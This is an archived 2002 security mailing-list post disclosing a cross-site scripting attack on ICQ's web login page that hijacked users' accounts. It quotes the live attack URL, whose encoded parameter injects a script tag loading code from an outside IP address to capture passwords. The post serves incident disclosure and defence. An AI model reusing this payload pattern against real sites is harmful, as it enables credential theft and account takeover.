Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > incidents > 02 > 120168.html (Request Expert securityfocus.com Support)

[Fwd: XSS on ICQ leading to password compromise]

From: Rafael Coninck Teigao <rafael(at)SafeCore.NET>
Date: Mon Dec 02 2002 - 11:29:37 EST


Moderator:

        I've sent the following email to bugtraq last week. Haven't seen it on the list, but it came to my attention that even more account's were hijacked this way.

        I'm also sending this to incidents, because I think that maybe some administrators are receiving similar complaints from their users and could (perhaps) block the XSS pages somehow.

  • Original Message -------- From: Rafael Coninck Teigao <rafael@SafeCore.NET> Subject: XSS on ICQ leading to password compromise To: SecurityFocus - Bugtraq <bugtraq@securityfocus.com> CC: horvath@avalon.sul.com.br, ahi@TELEFONICAEMPRESAS.NET.BR,nbso@nic.br

Hello, pp.

    I've tried to find some representative from de ICQ technical staff but had no success so far.

    Anyway, here's what's happening:
    A friend of mine got the following address on his ICQ from a friend on his contact list:
http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<script%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e

we can clearly see the <script... part on it. Unfortunately, he couldn't.

    When the page opened, he typed his email address and password. Five minutes later he was disconnected from ICQ and was unable to login again.

Do you need help?X

    He then tried to recover his password and saw that it was set to: aaaaa
a

    that's right, it has a new line on it.     The source on the script is:
http://200.158.50.245/web/icq.asa

    That IP address comes from an ADSL from Telesp. The date and time of the incident were Nov/24 at 20:12 (GMT -2).

    He also told me that the friend who sent him the address and another person had their accounts hijacked as well.

    Best regards,
    Rafael Coninck Teigao
    SafeCore Network Solutions
    http://SafeCore.NET
    +55 41 224 1785

--


"The only people for me are the mad ones -- the ones who are mad to 
live, mad to talk, mad to be saved, desirous of everything at the same
time, the ones who never yawn or say a commonplace thing, but burn,
burn, burn like fabulous yellow Roman candles."
  • Jack Kerouac, "On the Road"

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Mon Dec 2 18:32:36 2002

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:52 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library